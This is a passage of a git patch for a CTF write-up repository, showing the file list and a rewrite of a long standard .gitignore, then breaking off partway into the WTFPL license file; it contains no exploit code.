From 7728c15b1a9609743bef22b04d1c5f0f500763ca Mon Sep 17 00:00:00 2001 From: TooYoungTooSimp <6648049+TooYoungTooSimp@users.noreply.github.com> Date: Sun, 24 Feb 2019 22:31:06 +0800 Subject: [PATCH] Sun, 24 Feb 2019 22:31:06 +0800 --- .gitignore | 1858 +++++++++++++++++++------------------- LICENSE | 28 +- README.md | 4 +- l3hsec-writeup/README.md | 26 +- l3hsec-writeup/stack.py | 8 +- tamu-writeup/pwn1 | Bin 0 -> 7536 bytes tamu-writeup/pwn1wp.py | 7 + tamu-writeup/pwn2 | Bin 0 -> 7592 bytes tamu-writeup/pwn2wp.py | 5 + tamu-writeup/pwn4 | Bin 0 -> 7504 bytes tamu-writeup/pwn4wp.py | 4 + 11 files changed, 978 insertions(+), 962 deletions(-) create mode 100644 tamu-writeup/pwn1 create mode 100644 tamu-writeup/pwn1wp.py create mode 100644 tamu-writeup/pwn2 create mode 100644 tamu-writeup/pwn2wp.py create mode 100644 tamu-writeup/pwn4 create mode 100644 tamu-writeup/pwn4wp.py diff --git a/.gitignore b/.gitignore index e3d243a..b3244c2 100644 --- a/.gitignore +++ b/.gitignore @@ -1,929 +1,929 @@ -# ---> Python -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class - -# C extensions -*.so - -# Distribution / packaging -.Python -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib/ -lib64/ -parts/ -sdist/ -var/ -wheels/ -*.egg-info/ -.installed.cfg -*.egg -MANIFEST - -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. -*.manifest -*.spec - -# Installer logs -pip-log.txt -pip-delete-this-directory.txt - -# Unit test / coverage reports -htmlcov/ -.tox/ -.nox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*.cover -.hypothesis/ -.pytest_cache/ - -# Translations -*.mo -*.pot - -# Django stuff: -*.log -local_settings.py -db.sqlite3 - -# Flask stuff: -instance/ -.webassets-cache - -# Scrapy stuff: -.scrapy - -# Sphinx documentation -docs/_build/ - -# PyBuilder -target/ - -# Jupyter Notebook -.ipynb_checkpoints - -# IPython -profile_default/ -ipython_config.py - -# pyenv -.python-version - -# celery beat schedule file -celerybeat-schedule - -# SageMath parsed files -*.sage.py - -# Environments -.env -.venv -env/ -venv/ -ENV/ -env.bak/ -venv.bak/ - -# Spyder project settings -.spyderproject -.spyproject - -# Rope project settings -.ropeproject - -# mkdocs documentation -/site - -# mypy -.mypy_cache/ -.dmypy.json -dmypy.json - -# Pyre type checker -.pyre/ - -# ---> VisualStudio -## Ignore Visual Studio temporary files, build results, and -## files generated by popular Visual Studio add-ons. -## -## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore - -# User-specific files -*.rsuser -*.suo -*.user -*.userosscache -*.sln.docstates - -# User-specific files (MonoDevelop/Xamarin Studio) -*.userprefs - -# Build results -[Dd]ebug/ -[Dd]ebugPublic/ -[Rr]elease/ -[Rr]eleases/ -x64/ -x86/ -bld/ -[Bb]in/ -[Oo]bj/ -[Ll]og/ - -# Visual Studio 2015/2017 cache/options directory -.vs/ -# Uncomment if you have tasks that create the project's static files in wwwroot -#wwwroot/ - -# Visual Studio 2017 auto generated files -Generated\ Files/ - -# MSTest test Results -[Tt]est[Rr]esult*/ -[Bb]uild[Ll]og.* - -# NUNIT -*.VisualState.xml -TestResult.xml - -# Build Results of an ATL Project -[Dd]ebugPS/ -[Rr]eleasePS/ -dlldata.c - -# Benchmark Results -BenchmarkDotNet.Artifacts/ - -# .NET Core -project.lock.json -project.fragment.lock.json -artifacts/ - -# StyleCop -StyleCopReport.xml - -# Files built by Visual Studio -*_i.c -*_p.c -*_h.h -*.ilk -*.meta -*.obj -*.iobj -*.pch -*.pdb -*.ipdb -*.pgc -*.pgd -*.rsp -*.sbr -*.tlb -*.tli -*.tlh -*.tmp -*.tmp_proj -*_wpftmp.csproj -*.log -*.vspscc -*.vssscc -.builds -*.pidb -*.svclog -*.scc - -# Chutzpah Test files -_Chutzpah* - -# Visual C++ cache files -ipch/ -*.aps -*.ncb -*.opendb -*.opensdf -*.sdf -*.cachefile -*.VC.db -*.VC.VC.opendb - -# Visual Studio profiler -*.psess -*.vsp -*.vspx -*.sap - -# Visual Studio Trace Files -*.e2e - -# TFS 2012 Local Workspace -$tf/ - -# Guidance Automation Toolkit -*.gpState - -# ReSharper is a .NET coding add-in -_ReSharper*/ -*.[Rr]e[Ss]harper -*.DotSettings.user - -# JustCode is a .NET coding add-in -.JustCode - -# TeamCity is a build add-in -_TeamCity* - -# DotCover is a Code Coverage Tool -*.dotCover - -# AxoCover is a Code Coverage Tool -.axoCover/* -!.axoCover/settings.json - -# Visual Studio code coverage results -*.coverage -*.coveragexml - -# NCrunch -_NCrunch_* -.*crunch*.local.xml -nCrunchTemp_* - -# MightyMoose -*.mm.* -AutoTest.Net/ - -# Web workbench (sass) -.sass-cache/ - -# Installshield output folder -[Ee]xpress/ - -# DocProject is a documentation generator add-in -DocProject/buildhelp/ -DocProject/Help/*.HxT -DocProject/Help/*.HxC -DocProject/Help/*.hhc -DocProject/Help/*.hhk -DocProject/Help/*.hhp -DocProject/Help/Html2 -DocProject/Help/html - -# Click-Once directory -publish/ - -# Publish Web Output -*.[Pp]ublish.xml -*.azurePubxml -# Note: Comment the next line if you want to checkin your web deploy settings, -# but database connection strings (with potential passwords) will be unencrypted -*.pubxml -*.publishproj - -# Microsoft Azure Web App publish settings. Comment the next line if you want to -# checkin your Azure Web App publish settings, but sensitive information contained -# in these scripts will be unencrypted -PublishScripts/ - -# NuGet Packages -*.nupkg -# The packages folder can be ignored because of Package Restore -**/[Pp]ackages/* -# except build/, which is used as an MSBuild target. -!**/[Pp]ackages/build/ -# Uncomment if necessary however generally it will be regenerated when needed -#!**/[Pp]ackages/repositories.config -# NuGet v3's project.json files produces more ignorable files -*.nuget.props -*.nuget.targets - -# Microsoft Azure Build Output -csx/ -*.build.csdef - -# Microsoft Azure Emulator -ecf/ -rcf/ - -# Windows Store app package directories and files -AppPackages/ -BundleArtifacts/ -Package.StoreAssociation.xml -_pkginfo.txt -*.appx - -# Visual Studio cache files -# files ending in .cache can be ignored -*.[Cc]ache -# but keep track of directories ending in .cache -!*.[Cc]ache/ - -# Others -ClientBin/ -~$* -*~ -*.dbmdl -*.dbproj.schemaview -*.jfm -*.pfx -*.publishsettings -orleans.codegen.cs - -# Including strong name files can present a security risk -# (https://github.com/github/gitignore/pull/2483#issue-259490424) -#*.snk - -# Since there are multiple workflows, uncomment next line to ignore bower_components -# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) -#bower_components/ - -# RIA/Silverlight projects -Generated_Code/ - -# Backup & report files from converting an old project file -# to a newer Visual Studio version. Backup files are not needed, -# because we have git ;-) -_UpgradeReport_Files/ -Backup*/ -UpgradeLog*.XML -UpgradeLog*.htm -ServiceFabricBackup/ -*.rptproj.bak - -# SQL Server files -*.mdf -*.ldf -*.ndf - -# Business Intelligence projects -*.rdl.data -*.bim.layout -*.bim_*.settings -*.rptproj.rsuser - -# Microsoft Fakes -FakesAssemblies/ - -# GhostDoc plugin setting file -*.GhostDoc.xml - -# Node.js Tools for Visual Studio -.ntvs_analysis.dat -node_modules/ - -# Visual Studio 6 build log -*.plg - -# Visual Studio 6 workspace options file -*.opt - -# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) -*.vbw - -# Visual Studio LightSwitch build output -**/*.HTMLClient/GeneratedArtifacts -**/*.DesktopClient/GeneratedArtifacts -**/*.DesktopClient/ModelManifest.xml -**/*.Server/GeneratedArtifacts -**/*.Server/ModelManifest.xml -_Pvt_Extensions - -# Paket dependency manager -.paket/paket.exe -paket-files/ - -# FAKE - F# Make -.fake/ - -# JetBrains Rider -.idea/ -*.sln.iml - -# CodeRush personal settings -.cr/personal - -# Python Tools for Visual Studio (PTVS) -__pycache__/ -*.pyc - -# Cake - Uncomment if you are using it -# tools/** -# !tools/packages.config - -# Tabs Studio -*.tss - -# Telerik's JustMock configuration file -*.jmconfig - -# BizTalk build output -*.btp.cs -*.btm.cs -*.odx.cs -*.xsd.cs - -# OpenCover UI analysis results -OpenCover/ - -# Azure Stream Analytics local run output -ASALocalRun/ - -# MSBuild Binary and Structured Log -*.binlog - -# NVidia Nsight GPU debugger configuration file -*.nvuser - -# MFractors (Xamarin productivity tool) working folder -.mfractor/ - -# Local History for Visual Studio -.localhistory/ - -# ---> VisualStudioCode -.vscode/* -!.vscode/settings.json -!.vscode/tasks.json -!.vscode/launch.json -!.vscode/extensions.json - -# ---> C -# Prerequisites -*.d - -# Object files -*.o -*.ko -*.obj -*.elf - -# Linker output -*.ilk -*.map -*.exp - -# Precompiled Headers -*.gch -*.pch - -# Libraries -*.lib -*.a -*.la -*.lo - -# Shared objects (inc. Windows DLLs) -*.dll -*.so -*.so.* -*.dylib - -# Executables -*.exe -*.out -*.app -*.i*86 -*.x86_64 -*.hex - -# Debug files -*.dSYM/ -*.su -*.idb -*.pdb - -# Kernel Module Compile Results -*.mod* -*.cmd -.tmp_versions/ -modules.order -Module.symvers -Mkfile.old -dkms.conf - -# ---> C++ -# Prerequisites -*.d - -# Compiled Object files -*.slo -*.lo -*.o -*.obj - -# Precompiled Headers -*.gch -*.pch - -# Compiled Dynamic libraries -*.so -*.dylib -*.dll - -# Fortran module files -*.mod -*.smod - -# Compiled Static libraries -*.lai -*.la -*.a -*.lib - -# Executables -*.exe -*.out -*.app - -# ---> CMake -CMakeCache.txt -CMakeFiles -CMakeScripts -Testing -Makefile -cmake_install.cmake -install_manifest.txt -compile_commands.json -CTestTestfile.cmake - -# ---> Go -# Binaries for programs and plugins -*.exe -*.exe~ -*.dll -*.so -*.dylib - -# Test binary, build with `go test -c` -*.test - -# Output of the go coverage tool, specifically when used with LiteIDE -*.out - -# ---> Android -# Built application files -*.apk -*.ap_ -*.aab - -# Files for the ART/Dalvik VM -*.dex - -# Java class files -*.class - -# Generated files -bin/ -gen/ -out/ - -# Gradle files -.gradle/ -build/ - -# Local configuration file (sdk path, etc) -local.properties - -# Proguard folder generated by Eclipse -proguard/ - -# Log Files -*.log - -# Android Studio Navigation editor temp files -.navigation/ - -# Android Studio captures folder -captures/ - -# IntelliJ -*.iml -.idea/workspace.xml -.idea/tasks.xml -.idea/gradle.xml -.idea/assetWizardSettings.xml -.idea/dictionaries -.idea/libraries -.idea/caches - -# Keystore files -# Uncomment the following lines if you do not want to check your keystore files in. -#*.jks -#*.keystore - -# External native build folder generated in Android Studio 2.2 and later -.externalNativeBuild - -# Google Services (e.g. APIs or Firebase) -google-services.json - -# Freeline -freeline.py -freeline/ -freeline_project_description.json - -# fastlane -fastlane/report.xml -fastlane/Preview.html -fastlane/screenshots -fastlane/test_output -fastlane/readme.md - -# ---> Perl -!Build/ -.last_cover_stats -/META.yml -/META.json -/MYMETA.* -*.o -*.pm.tdy -*.bs - -# Devel::Cover -cover_db/ - -# Devel::NYTProf -nytprof.out - -# Dizt::Zilla -/.build/ - -# Module::Build -_build/ -Build -Build.bat - -# Module::Install -inc/ - -# ExtUtils::MakeMaker -/blib/ -/_eumm/ -/*.gz -/Makefile -/Makefile.old -/MANIFEST.bak -/pm_to_blib -/*.zip - -# ---> Perl6 -# Gitignore for Perl 6 (http://www.perl6.org) -# As part of https://github.com/github/gitignore - -# precompiled files -.precomp -lib/.precomp - - -# ---> JetBrains -# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm -# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 - -# User-specific stuff -.idea/**/workspace.xml -.idea/**/tasks.xml -.idea/**/usage.statistics.xml -.idea/**/dictionaries -.idea/**/shelf - -# Generated files -.idea/**/contentModel.xml - -# Sensitive or high-churn files -.idea/**/dataSources/ -.idea/**/dataSources.ids -.idea/**/dataSources.local.xml -.idea/**/sqlDataSources.xml -.idea/**/dynamic.xml -.idea/**/uiDesigner.xml -.idea/**/dbnavigator.xml - -# Gradle -.idea/**/gradle.xml -.idea/**/libraries - -# Gradle and Maven with auto-import -# When using Gradle or Maven with auto-import, you should exclude module files, -# since they will be recreated, and may cause churn. Uncomment if using -# auto-import. -# .idea/modules.xml -# .idea/*.iml -# .idea/modules - -# CMake -cmake-build-*/ - -# Mongo Explorer plugin -.idea/**/mongoSettings.xml - -# File-based project format -*.iws - -# IntelliJ -out/ - -# mpeltonen/sbt-idea plugin -.idea_modules/ - -# JIRA plugin -atlassian-ide-plugin.xml - -# Cursive Clojure plugin -.idea/replstate.xml - -# Crashlytics plugin (for Android Studio and IntelliJ) -com_crashlytics_export_strings.xml -crashlytics.properties -crashlytics-build.properties -fabric.properties - -# Editor-based Rest Client -.idea/httpRequests - -# Android studio 3.1+ serialized cache file -.idea/caches/build_file_checksums.ser - -# ---> Kotlin -# Compiled class file -*.class - -# Log file -*.log - -# BlueJ files -*.ctxt - -# Mobile Tools for Java (J2ME) -.mtj.tmp/ - -# Package Files # -*.jar -*.war -*.nar -*.ear -*.zip -*.tar.gz -*.rar - -# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml -hs_err_pid* - -# ---> Linux -*~ - -# temporary files which can be created if a process still has a handle open of a deleted file -.fuse_hidden* - -# KDE directory preferences -.directory - -# Linux trash folder which might appear on any partition or disk -.Trash-* - -# .nfs files are created when an open file is removed but is still being accessed -.nfs* - -# ---> MicrosoftOffice -*.tmp - -# Word temporary -~$*.doc* - -# Word Auto Backup File -Backup of *.doc* - -# Excel temporary -~$*.xls* - -# Excel Backup File -*.xlk - -# PowerPoint temporary -~$*.ppt* - -# Visio autosave temporary files -*.~vsd* - -# ---> MonoDevelop -#User Specific -*.userprefs -*.usertasks - -#Mono Project Files -*.pidb -*.resources -test-results/ - -# ---> Node -# Logs -logs -*.log -npm-debug.log* -yarn-debug.log* -yarn-error.log* - -# Runtime data -pids -*.pid -*.seed -*.pid.lock - -# Directory for instrumented libs generated by jscoverage/JSCover -lib-cov - -# Coverage directory used by tools like istanbul -coverage - -# nyc test coverage -.nyc_output - -# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) -.grunt - -# Bower dependency directory (https://bower.io/) -bower_components - -# node-waf configuration -.lock-wscript - -# Compiled binary addons (https://nodejs.org/api/addons.html) -build/Release - -# Dependency directories -node_modules/ -jspm_packages/ - -# TypeScript v1 declaration files -typings/ - -# Optional npm cache directory -.npm - -# Optional eslint cache -.eslintcache - -# Optional REPL history -.node_repl_history - -# Output of 'npm pack' -*.tgz - -# Yarn Integrity file -.yarn-integrity - -# dotenv environment variables file -.env - -# parcel-bundler cache (https://parceljs.org/) -.cache - -# next.js build output -.next - -# nuxt.js build output -.nuxt - -# vuepress build output -.vuepress/dist - -# Serverless directories -.serverless - -# FuseBox cache -.fusebox/ - -# ---> Windows -# Windows thumbnail cache files -Thumbs.db -ehthumbs.db -ehthumbs_vista.db - -# Dump file -*.stackdump - -# Folder config file -[Dd]esktop.ini - -# Recycle Bin used on file shares -$RECYCLE.BIN/ - -# Windows Installer files -*.cab -*.msi -*.msix -*.msm -*.msp - -# Windows shortcuts -*.lnk - +# ---> Python +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ +.pytest_cache/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# ---> VisualStudio +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. +## +## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUNIT +*.VisualState.xml +TestResult.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# JustCode is a .NET coding add-in +.JustCode + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# JetBrains Rider +.idea/ +*.sln.iml + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# ---> VisualStudioCode +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json + +# ---> C +# Prerequisites +*.d + +# Object files +*.o +*.ko +*.obj +*.elf + +# Linker output +*.ilk +*.map +*.exp + +# Precompiled Headers +*.gch +*.pch + +# Libraries +*.lib +*.a +*.la +*.lo + +# Shared objects (inc. Windows DLLs) +*.dll +*.so +*.so.* +*.dylib + +# Executables +*.exe +*.out +*.app +*.i*86 +*.x86_64 +*.hex + +# Debug files +*.dSYM/ +*.su +*.idb +*.pdb + +# Kernel Module Compile Results +*.mod* +*.cmd +.tmp_versions/ +modules.order +Module.symvers +Mkfile.old +dkms.conf + +# ---> C++ +# Prerequisites +*.d + +# Compiled Object files +*.slo +*.lo +*.o +*.obj + +# Precompiled Headers +*.gch +*.pch + +# Compiled Dynamic libraries +*.so +*.dylib +*.dll + +# Fortran module files +*.mod +*.smod + +# Compiled Static libraries +*.lai +*.la +*.a +*.lib + +# Executables +*.exe +*.out +*.app + +# ---> CMake +CMakeCache.txt +CMakeFiles +CMakeScripts +Testing +Makefile +cmake_install.cmake +install_manifest.txt +compile_commands.json +CTestTestfile.cmake + +# ---> Go +# Binaries for programs and plugins +*.exe +*.exe~ +*.dll +*.so +*.dylib + +# Test binary, build with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# ---> Android +# Built application files +*.apk +*.ap_ +*.aab + +# Files for the ART/Dalvik VM +*.dex + +# Java class files +*.class + +# Generated files +bin/ +gen/ +out/ + +# Gradle files +.gradle/ +build/ + +# Local configuration file (sdk path, etc) +local.properties + +# Proguard folder generated by Eclipse +proguard/ + +# Log Files +*.log + +# Android Studio Navigation editor temp files +.navigation/ + +# Android Studio captures folder +captures/ + +# IntelliJ +*.iml +.idea/workspace.xml +.idea/tasks.xml +.idea/gradle.xml +.idea/assetWizardSettings.xml +.idea/dictionaries +.idea/libraries +.idea/caches + +# Keystore files +# Uncomment the following lines if you do not want to check your keystore files in. +#*.jks +#*.keystore + +# External native build folder generated in Android Studio 2.2 and later +.externalNativeBuild + +# Google Services (e.g. APIs or Firebase) +google-services.json + +# Freeline +freeline.py +freeline/ +freeline_project_description.json + +# fastlane +fastlane/report.xml +fastlane/Preview.html +fastlane/screenshots +fastlane/test_output +fastlane/readme.md + +# ---> Perl +!Build/ +.last_cover_stats +/META.yml +/META.json +/MYMETA.* +*.o +*.pm.tdy +*.bs + +# Devel::Cover +cover_db/ + +# Devel::NYTProf +nytprof.out + +# Dizt::Zilla +/.build/ + +# Module::Build +_build/ +Build +Build.bat + +# Module::Install +inc/ + +# ExtUtils::MakeMaker +/blib/ +/_eumm/ +/*.gz +/Makefile +/Makefile.old +/MANIFEST.bak +/pm_to_blib +/*.zip + +# ---> Perl6 +# Gitignore for Perl 6 (http://www.perl6.org) +# As part of https://github.com/github/gitignore + +# precompiled files +.precomp +lib/.precomp + + +# ---> JetBrains +# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm +# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 + +# User-specific stuff +.idea/**/workspace.xml +.idea/**/tasks.xml +.idea/**/usage.statistics.xml +.idea/**/dictionaries +.idea/**/shelf + +# Generated files +.idea/**/contentModel.xml + +# Sensitive or high-churn files +.idea/**/dataSources/ +.idea/**/dataSources.ids +.idea/**/dataSources.local.xml +.idea/**/sqlDataSources.xml +.idea/**/dynamic.xml +.idea/**/uiDesigner.xml +.idea/**/dbnavigator.xml + +# Gradle +.idea/**/gradle.xml +.idea/**/libraries + +# Gradle and Maven with auto-import +# When using Gradle or Maven with auto-import, you should exclude module files, +# since they will be recreated, and may cause churn. Uncomment if using +# auto-import. +# .idea/modules.xml +# .idea/*.iml +# .idea/modules + +# CMake +cmake-build-*/ + +# Mongo Explorer plugin +.idea/**/mongoSettings.xml + +# File-based project format +*.iws + +# IntelliJ +out/ + +# mpeltonen/sbt-idea plugin +.idea_modules/ + +# JIRA plugin +atlassian-ide-plugin.xml + +# Cursive Clojure plugin +.idea/replstate.xml + +# Crashlytics plugin (for Android Studio and IntelliJ) +com_crashlytics_export_strings.xml +crashlytics.properties +crashlytics-build.properties +fabric.properties + +# Editor-based Rest Client +.idea/httpRequests + +# Android studio 3.1+ serialized cache file +.idea/caches/build_file_checksums.ser + +# ---> Kotlin +# Compiled class file +*.class + +# Log file +*.log + +# BlueJ files +*.ctxt + +# Mobile Tools for Java (J2ME) +.mtj.tmp/ + +# Package Files # +*.jar +*.war +*.nar +*.ear +*.zip +*.tar.gz +*.rar + +# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml +hs_err_pid* + +# ---> Linux +*~ + +# temporary files which can be created if a process still has a handle open of a deleted file +.fuse_hidden* + +# KDE directory preferences +.directory + +# Linux trash folder which might appear on any partition or disk +.Trash-* + +# .nfs files are created when an open file is removed but is still being accessed +.nfs* + +# ---> MicrosoftOffice +*.tmp + +# Word temporary +~$*.doc* + +# Word Auto Backup File +Backup of *.doc* + +# Excel temporary +~$*.xls* + +# Excel Backup File +*.xlk + +# PowerPoint temporary +~$*.ppt* + +# Visio autosave temporary files +*.~vsd* + +# ---> MonoDevelop +#User Specific +*.userprefs +*.usertasks + +#Mono Project Files +*.pidb +*.resources +test-results/ + +# ---> Node +# Logs +logs +*.log +npm-debug.log* +yarn-debug.log* +yarn-error.log* + +# Runtime data +pids +*.pid +*.seed +*.pid.lock + +# Directory for instrumented libs generated by jscoverage/JSCover +lib-cov + +# Coverage directory used by tools like istanbul +coverage + +# nyc test coverage +.nyc_output + +# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) +.grunt + +# Bower dependency directory (https://bower.io/) +bower_components + +# node-waf configuration +.lock-wscript + +# Compiled binary addons (https://nodejs.org/api/addons.html) +build/Release + +# Dependency directories +node_modules/ +jspm_packages/ + +# TypeScript v1 declaration files +typings/ + +# Optional npm cache directory +.npm + +# Optional eslint cache +.eslintcache + +# Optional REPL history +.node_repl_history + +# Output of 'npm pack' +*.tgz + +# Yarn Integrity file +.yarn-integrity + +# dotenv environment variables file +.env + +# parcel-bundler cache (https://parceljs.org/) +.cache + +# next.js build output +.next + +# nuxt.js build output +.nuxt + +# vuepress build output +.vuepress/dist + +# Serverless directories +.serverless + +# FuseBox cache +.fusebox/ + +# ---> Windows +# Windows thumbnail cache files +Thumbs.db +ehthumbs.db +ehthumbs_vista.db + +# Dump file +*.stackdump + +# Folder config file +[Dd]esktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Windows Installer files +*.cab +*.msi +*.msix +*.msm +*.msp + +# Windows shortcuts +*.lnk + diff --git a/LICENSE b/LICENSE index 9c31dda..6976e22 100644 --- a/LICENSE +++ b/LICENSE @@ -1,14 +1,14 @@ -DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE - -Version 2, December 2004 - -Copyright (C) 2004 Sam Hocevar - -Everyone is permitted to copy and distribute verbatim or modified copies of -this license document, and changing it is allowed as long as the name is changed. - -DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE - -TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND 